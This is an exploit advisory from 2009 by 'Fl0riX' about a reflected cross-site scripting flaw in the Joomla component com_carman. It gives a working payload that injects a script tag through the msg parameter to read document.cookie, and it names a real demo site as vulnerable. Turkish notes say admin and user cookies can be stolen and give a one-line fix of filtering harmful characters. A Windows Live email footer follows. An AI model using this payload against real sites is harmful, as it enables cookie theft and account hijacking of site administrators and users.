joomlacarman-xss.txt
Posted on 23 December 2009
< ------------------- header data start ------------------- > ##################################################################### Joomla Component com_carman Cross Site Scripting Vulnerability #################################################################### # author :Fl0riX # Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r # Name : com_carman # Bug Type : Cross Site Scripting # Infection : Yönetici ve User cookie’leri çalýnabilir. # Bug Fix Advice : Zararlý karakterler filtrelenmelidir. # Demo Vuln. : http://carman.webformatique.com/index.php?option=com_carman&msg=[XSS CODE] ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > /index.php?option=com_carman&msg="><script>alert(document.cookie)</script> < -- bug code end of -- > _________________________________________________________________ Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010
